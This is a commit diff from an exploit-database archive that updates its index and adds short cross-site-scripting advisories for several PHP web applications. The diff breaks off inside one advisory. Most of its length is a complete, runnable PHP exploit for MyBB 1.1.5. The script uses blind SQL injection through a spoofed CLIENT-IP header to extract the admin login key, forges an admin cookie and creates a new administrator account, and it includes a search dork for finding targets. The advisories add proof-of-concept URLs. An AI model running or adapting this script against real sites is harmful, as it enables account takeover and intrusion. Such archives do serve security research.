DB: 2015-03-26
11 new exploits
This commit is contained in:
parent
8f1f948d2a
commit
3ab5d7365a
13 changed files with 625 additions and 327 deletions
13
files.csv
13
files.csv
|
@ -1717,7 +1717,7 @@ id,file,description,date,author,platform,type,port
|
|||
2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability",2006-07-13,SHiKaA,php,webapps,0
|
||||
2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
|
||||
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
|
||||
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
|
||||
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
|
||||
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
|
||||
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
|
@ -32898,3 +32898,14 @@ id,file,description,date,author,platform,type,port
|
|||
36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
|
||||
36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
|
||||
36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0
|
||||
36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0
|
||||
36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
|
||||
36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
|
||||
36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
|
||||
36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0
|
||||
36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0
|
||||
36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0
|
||||
36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
|
||||
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
|
||||
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
|
||||
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,326 +1,326 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
echo "site: http://retrogod.altervista.org\n";
|
||||
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
|
||||
/*
|
||||
works regardless of php.ini settings
|
||||
*/
|
||||
if ($argc<3) {
|
||||
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
|
||||
echo "host: target server (ip/hostname)\n";
|
||||
echo "path: path to MyBB\n";
|
||||
echo "Options:\n";
|
||||
echo " -T[prefix] specify a table prefix different from default (mybb_)\n";
|
||||
echo " -u[number] specify a user id other than 1 (usually admin)\n";
|
||||
echo " -p[port]: specify a port other than 80\n";
|
||||
echo " -P[ip:port]: specify a proxy\n";
|
||||
echo " -d: disclose table prefix (reccomended)\n";
|
||||
echo "Example:\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
|
||||
die;
|
||||
}
|
||||
/* software site: http://www.mybboard.com/
|
||||
|
||||
vulnerable code in inc/functions.php near lines 1292-1320:
|
||||
|
||||
...
|
||||
function getip() {
|
||||
global $_SERVER;
|
||||
if($_SERVER['HTTP_X_FORWARDED_FOR'])
|
||||
{
|
||||
if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
|
||||
{
|
||||
while(list($key, $val) = each($addresses[0]))
|
||||
{
|
||||
if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
|
||||
{
|
||||
$ip = $val;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if(!$ip)
|
||||
{
|
||||
if($_SERVER['HTTP_CLIENT_IP'])
|
||||
{
|
||||
$ip = $_SERVER['HTTP_CLIENT_IP'];
|
||||
}
|
||||
else
|
||||
{
|
||||
$ip = $_SERVER['REMOTE_ADDR'];
|
||||
}
|
||||
}
|
||||
return $ip;
|
||||
}
|
||||
...
|
||||
|
||||
you can spoof your ip address through the CLIENT-IP http header...
|
||||
as result you can inject sql statements in class_session.php at lines 36-68:
|
||||
by calling the main index.php script
|
||||
...
|
||||
function init()
|
||||
{
|
||||
global $ipaddress, $db, $mybb, $noonline;
|
||||
//
|
||||
// Get our visitors IP
|
||||
//
|
||||
$this->ipaddress = $ipaddress = getip();
|
||||
|
||||
//
|
||||
// User-agent
|
||||
//
|
||||
$this->useragent = $_SERVER['HTTP_USER_AGENT'];
|
||||
if(strlen($this->useragent) > 100)
|
||||
{
|
||||
$this->useragent = substr($this->useragent, 0, 100);
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to find a session id in the cookies
|
||||
//
|
||||
if($_COOKIE['sid'])
|
||||
{
|
||||
$this->sid = addslashes($_COOKIE['sid']);
|
||||
}
|
||||
else
|
||||
{
|
||||
$this->sid = 0;
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to load the session from the database
|
||||
//
|
||||
$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
|
||||
...
|
||||
|
||||
injection is blind, but you can ask true-false questions to the database to
|
||||
retrieve the admin loginkey.
|
||||
Through that you can build an admin cookie and create a new admin user through
|
||||
the admin/users.php script.
|
||||
Also you can disclose table prefix.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
|
||||
-*****************************************************************************-
|
||||
* *
|
||||
* Italia - Germania 2-0, al 114' forse il più bel gol che abbia mai visto *
|
||||
* grazie Grosso! *
|
||||
* *
|
||||
-*****************************************************************************-
|
||||
*/
|
||||
|
||||
error_reporting(0);
|
||||
ini_set("max_execution_time",0);
|
||||
ini_set("default_socket_timeout",5);
|
||||
|
||||
function quick_dump($string)
|
||||
{
|
||||
$result='';$exa='';$cont=0;
|
||||
for ($i=0; $i<=strlen($string)-1; $i++)
|
||||
{
|
||||
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
|
||||
{$result.=" .";}
|
||||
else
|
||||
{$result.=" ".$string[$i];}
|
||||
if (strlen(dechex(ord($string[$i])))==2)
|
||||
{$exa.=" ".dechex(ord($string[$i]));}
|
||||
else
|
||||
{$exa.=" 0".dechex(ord($string[$i]));}
|
||||
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
|
||||
}
|
||||
return $exa."\r\n".$result;
|
||||
}
|
||||
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
|
||||
function sendpacketii($packet)
|
||||
{
|
||||
global $proxy, $host, $port, $html, $proxy_regex;
|
||||
if ($proxy=='') {
|
||||
$ock=fsockopen(gethostbyname($host),$port);
|
||||
if (!$ock) {
|
||||
echo 'No response from '.$host.':'.$port; die;
|
||||
}
|
||||
}
|
||||
else {
|
||||
$c = preg_match($proxy_regex,$proxy);
|
||||
if (!$c) {
|
||||
echo 'Not a valid proxy...';die;
|
||||
}
|
||||
$parts=explode(':',$proxy);
|
||||
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
|
||||
$ock=fsockopen($parts[0],$parts[1]);
|
||||
if (!$ock) {
|
||||
echo 'No response from proxy...';die;
|
||||
}
|
||||
}
|
||||
fputs($ock,$packet);
|
||||
if ($proxy=='') {
|
||||
$html='';
|
||||
while (!feof($ock)) {
|
||||
$html.=fgets($ock);
|
||||
}
|
||||
}
|
||||
else {
|
||||
$html='';
|
||||
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
|
||||
$html.=fread($ock,1);
|
||||
}
|
||||
}
|
||||
fclose($ock);
|
||||
#debug
|
||||
#echo "\r\n".$html;
|
||||
}
|
||||
|
||||
function make_seed()
|
||||
{
|
||||
list($usec, $sec) = explode(' ', microtime());
|
||||
return (float) $sec + ((float) $usec * 100000);
|
||||
}
|
||||
srand(make_seed());
|
||||
$anumber = rand(1,99999);
|
||||
|
||||
$host=$argv[1];
|
||||
$path=$argv[2];
|
||||
$port=80;
|
||||
$prefix="mybb_";
|
||||
$user_id="1";//admin
|
||||
$proxy="";
|
||||
$dt=0;
|
||||
for ($i=3; $i<$argc; $i++){
|
||||
$temp=$argv[$i][0].$argv[$i][1];
|
||||
if ($temp=="-p")
|
||||
{
|
||||
$port=str_replace("-p","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-P")
|
||||
{
|
||||
$proxy=str_replace("-P","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-T")
|
||||
{
|
||||
$prefix=str_replace("-T","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-u")
|
||||
{
|
||||
$user_id=str_replace("-u","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-d")
|
||||
{
|
||||
$dt=1;
|
||||
}
|
||||
}
|
||||
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
|
||||
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
|
||||
|
||||
if ($dt)
|
||||
{
|
||||
$sql="'suntzuuuu/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("You have an error in your SQL syntax",$html))
|
||||
{
|
||||
$temp=explode("sessions",$html);
|
||||
$temp2=explode(" ",$temp[0]);
|
||||
$prefix=$temp2[count($temp2)-1];
|
||||
echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "unable to disclose table prefix...\n";
|
||||
}
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
$chars[0]=0;//null
|
||||
$chars=array_merge($chars,range(48,57)); //numbers
|
||||
$chars=array_merge($chars,range(65,90));//A-Z letters
|
||||
$chars=array_merge($chars,range(97,122));//a-f letters
|
||||
$j=1;
|
||||
$loginkey="";
|
||||
while (!strstr($loginkey,chr(0)))
|
||||
{
|
||||
for ($i=0; $i<=255; $i++)
|
||||
{
|
||||
if (in_array($i,$chars))
|
||||
{
|
||||
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
|
||||
}
|
||||
if ($i==255) {die("Exploit failed...");}
|
||||
}
|
||||
$j++;
|
||||
}
|
||||
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
|
||||
echo "admin cookie -> ".$cookie."\r\n";
|
||||
|
||||
|
||||
$data='-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="action";
|
||||
|
||||
do_add
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="userusername";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="newpassword";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="email";
|
||||
|
||||
suntzoi@suntzu.org
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="usergroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="additionalgroups[]";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="displaygroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="Add User";
|
||||
|
||||
Add User
|
||||
-----------------------------7d62702f250530--
|
||||
';
|
||||
|
||||
$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
|
||||
$packet.="User-Agent: Googlebot/2.1\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
|
||||
$packet.="Content-Length: ".strlen($data)."\r\n";
|
||||
$packet.="Cookie: ".$cookie."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
$packet.=$data;
|
||||
sendpacketii($packet);
|
||||
if (eregi("The user has successfully been added",$html))
|
||||
{
|
||||
echo "exploit succeeded... now login as admin\n";
|
||||
echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
|
||||
}
|
||||
?>
|
||||
|
||||
# milw0rm.com [2006-07-15]
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
echo "site: http://retrogod.altervista.org\n";
|
||||
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
|
||||
/*
|
||||
works regardless of php.ini settings
|
||||
*/
|
||||
if ($argc<3) {
|
||||
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
|
||||
echo "host: target server (ip/hostname)\n";
|
||||
echo "path: path to MyBB\n";
|
||||
echo "Options:\n";
|
||||
echo " -T[prefix] specify a table prefix different from default (mybb_)\n";
|
||||
echo " -u[number] specify a user id other than 1 (usually admin)\n";
|
||||
echo " -p[port]: specify a port other than 80\n";
|
||||
echo " -P[ip:port]: specify a proxy\n";
|
||||
echo " -d: disclose table prefix (reccomended)\n";
|
||||
echo "Example:\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
|
||||
echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
|
||||
die;
|
||||
}
|
||||
/* software site: http://www.mybboard.com/
|
||||
|
||||
vulnerable code in inc/functions.php near lines 1292-1320:
|
||||
|
||||
...
|
||||
function getip() {
|
||||
global $_SERVER;
|
||||
if($_SERVER['HTTP_X_FORWARDED_FOR'])
|
||||
{
|
||||
if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
|
||||
{
|
||||
while(list($key, $val) = each($addresses[0]))
|
||||
{
|
||||
if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
|
||||
{
|
||||
$ip = $val;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if(!$ip)
|
||||
{
|
||||
if($_SERVER['HTTP_CLIENT_IP'])
|
||||
{
|
||||
$ip = $_SERVER['HTTP_CLIENT_IP'];
|
||||
}
|
||||
else
|
||||
{
|
||||
$ip = $_SERVER['REMOTE_ADDR'];
|
||||
}
|
||||
}
|
||||
return $ip;
|
||||
}
|
||||
...
|
||||
|
||||
you can spoof your ip address through the CLIENT-IP http header...
|
||||
as result you can inject sql statements in class_session.php at lines 36-68:
|
||||
by calling the main index.php script
|
||||
...
|
||||
function init()
|
||||
{
|
||||
global $ipaddress, $db, $mybb, $noonline;
|
||||
//
|
||||
// Get our visitors IP
|
||||
//
|
||||
$this->ipaddress = $ipaddress = getip();
|
||||
|
||||
//
|
||||
// User-agent
|
||||
//
|
||||
$this->useragent = $_SERVER['HTTP_USER_AGENT'];
|
||||
if(strlen($this->useragent) > 100)
|
||||
{
|
||||
$this->useragent = substr($this->useragent, 0, 100);
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to find a session id in the cookies
|
||||
//
|
||||
if($_COOKIE['sid'])
|
||||
{
|
||||
$this->sid = addslashes($_COOKIE['sid']);
|
||||
}
|
||||
else
|
||||
{
|
||||
$this->sid = 0;
|
||||
}
|
||||
|
||||
//
|
||||
// Attempt to load the session from the database
|
||||
//
|
||||
$query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
|
||||
...
|
||||
|
||||
injection is blind, but you can ask true-false questions to the database to
|
||||
retrieve the admin loginkey.
|
||||
Through that you can build an admin cookie and create a new admin user through
|
||||
the admin/users.php script.
|
||||
Also you can disclose table prefix.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
|
||||
-*****************************************************************************-
|
||||
* *
|
||||
* Italia - Germania 2-0, al 114' forse il più bel gol che abbia mai visto *
|
||||
* grazie Grosso! *
|
||||
* *
|
||||
-*****************************************************************************-
|
||||
*/
|
||||
|
||||
error_reporting(0);
|
||||
ini_set("max_execution_time",0);
|
||||
ini_set("default_socket_timeout",5);
|
||||
|
||||
function quick_dump($string)
|
||||
{
|
||||
$result='';$exa='';$cont=0;
|
||||
for ($i=0; $i<=strlen($string)-1; $i++)
|
||||
{
|
||||
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
|
||||
{$result.=" .";}
|
||||
else
|
||||
{$result.=" ".$string[$i];}
|
||||
if (strlen(dechex(ord($string[$i])))==2)
|
||||
{$exa.=" ".dechex(ord($string[$i]));}
|
||||
else
|
||||
{$exa.=" 0".dechex(ord($string[$i]));}
|
||||
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
|
||||
}
|
||||
return $exa."\r\n".$result;
|
||||
}
|
||||
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
|
||||
function sendpacketii($packet)
|
||||
{
|
||||
global $proxy, $host, $port, $html, $proxy_regex;
|
||||
if ($proxy=='') {
|
||||
$ock=fsockopen(gethostbyname($host),$port);
|
||||
if (!$ock) {
|
||||
echo 'No response from '.$host.':'.$port; die;
|
||||
}
|
||||
}
|
||||
else {
|
||||
$c = preg_match($proxy_regex,$proxy);
|
||||
if (!$c) {
|
||||
echo 'Not a valid proxy...';die;
|
||||
}
|
||||
$parts=explode(':',$proxy);
|
||||
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
|
||||
$ock=fsockopen($parts[0],$parts[1]);
|
||||
if (!$ock) {
|
||||
echo 'No response from proxy...';die;
|
||||
}
|
||||
}
|
||||
fputs($ock,$packet);
|
||||
if ($proxy=='') {
|
||||
$html='';
|
||||
while (!feof($ock)) {
|
||||
$html.=fgets($ock);
|
||||
}
|
||||
}
|
||||
else {
|
||||
$html='';
|
||||
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
|
||||
$html.=fread($ock,1);
|
||||
}
|
||||
}
|
||||
fclose($ock);
|
||||
#debug
|
||||
#echo "\r\n".$html;
|
||||
}
|
||||
|
||||
function make_seed()
|
||||
{
|
||||
list($usec, $sec) = explode(' ', microtime());
|
||||
return (float) $sec + ((float) $usec * 100000);
|
||||
}
|
||||
srand(make_seed());
|
||||
$anumber = rand(1,99999);
|
||||
|
||||
$host=$argv[1];
|
||||
$path=$argv[2];
|
||||
$port=80;
|
||||
$prefix="mybb_";
|
||||
$user_id="1";//admin
|
||||
$proxy="";
|
||||
$dt=0;
|
||||
for ($i=3; $i<$argc; $i++){
|
||||
$temp=$argv[$i][0].$argv[$i][1];
|
||||
if ($temp=="-p")
|
||||
{
|
||||
$port=str_replace("-p","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-P")
|
||||
{
|
||||
$proxy=str_replace("-P","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-T")
|
||||
{
|
||||
$prefix=str_replace("-T","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-u")
|
||||
{
|
||||
$user_id=str_replace("-u","",$argv[$i]);
|
||||
}
|
||||
if ($temp=="-d")
|
||||
{
|
||||
$dt=1;
|
||||
}
|
||||
}
|
||||
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
|
||||
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
|
||||
|
||||
if ($dt)
|
||||
{
|
||||
$sql="'suntzuuuu/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("You have an error in your SQL syntax",$html))
|
||||
{
|
||||
$temp=explode("sessions",$html);
|
||||
$temp2=explode(" ",$temp[0]);
|
||||
$prefix=$temp2[count($temp2)-1];
|
||||
echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "unable to disclose table prefix...\n";
|
||||
}
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
$chars[0]=0;//null
|
||||
$chars=array_merge($chars,range(48,57)); //numbers
|
||||
$chars=array_merge($chars,range(65,90));//A-Z letters
|
||||
$chars=array_merge($chars,range(97,122));//a-f letters
|
||||
$j=1;
|
||||
$loginkey="";
|
||||
while (!strstr($loginkey,chr(0)))
|
||||
{
|
||||
for ($i=0; $i<=255; $i++)
|
||||
{
|
||||
if (in_array($i,$chars))
|
||||
{
|
||||
$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
|
||||
echo "sql -> ".$sql."\r\n";
|
||||
$packet ="GET ".$p."index.php HTTP/1.0\r\n";
|
||||
$packet.="CLIENT-IP: $sql\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
sendpacketii($packet);
|
||||
if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
|
||||
}
|
||||
if ($i==255) {die("Exploit failed...");}
|
||||
}
|
||||
$j++;
|
||||
}
|
||||
$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
|
||||
echo "admin cookie -> ".$cookie."\r\n";
|
||||
|
||||
|
||||
$data='-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="action";
|
||||
|
||||
do_add
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="userusername";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="newpassword";
|
||||
|
||||
suntzu'.$anumber.'
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="email";
|
||||
|
||||
suntzoi@suntzu.org
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="usergroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="additionalgroups[]";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="displaygroup";
|
||||
|
||||
4
|
||||
-----------------------------7d62702f250530
|
||||
Content-Disposition: form-data; name="Add User";
|
||||
|
||||
Add User
|
||||
-----------------------------7d62702f250530--
|
||||
';
|
||||
|
||||
$packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
|
||||
$packet.="User-Agent: Googlebot/2.1\r\n";
|
||||
$packet.="Host: ".$host."\r\n";
|
||||
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
|
||||
$packet.="Content-Length: ".strlen($data)."\r\n";
|
||||
$packet.="Cookie: ".$cookie."\r\n";
|
||||
$packet.="Connection: Close\r\n\r\n";
|
||||
$packet.=$data;
|
||||
sendpacketii($packet);
|
||||
if (eregi("The user has successfully been added",$html))
|
||||
{
|
||||
echo "exploit succeeded... now login as admin\n";
|
||||
echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
|
||||
}
|
||||
?>
|
||||
|
||||
# milw0rm.com [2006-07-15]
|
||||
|
|
9
platforms/php/webapps/36481.txt
Executable file
9
platforms/php/webapps/36481.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51216/info
|
||||
|
||||
The TheCartPress WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234
|
9
platforms/php/webapps/36482.txt
Executable file
9
platforms/php/webapps/36482.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51218/info
|
||||
|
||||
Siena CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Siena CMS 1.242 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?err=[XSS]
|
7
platforms/php/webapps/36483.txt
Executable file
7
platforms/php/webapps/36483.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51220/info
|
||||
|
||||
WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss]
|
7
platforms/php/webapps/36484.txt
Executable file
7
platforms/php/webapps/36484.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51221/info
|
||||
|
||||
PHPB2B is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/[patch]/list.php?do=search&q=[XSS]
|
9
platforms/php/webapps/36485.txt
Executable file
9
platforms/php/webapps/36485.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51227/info
|
||||
|
||||
FuseTalk Forums is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
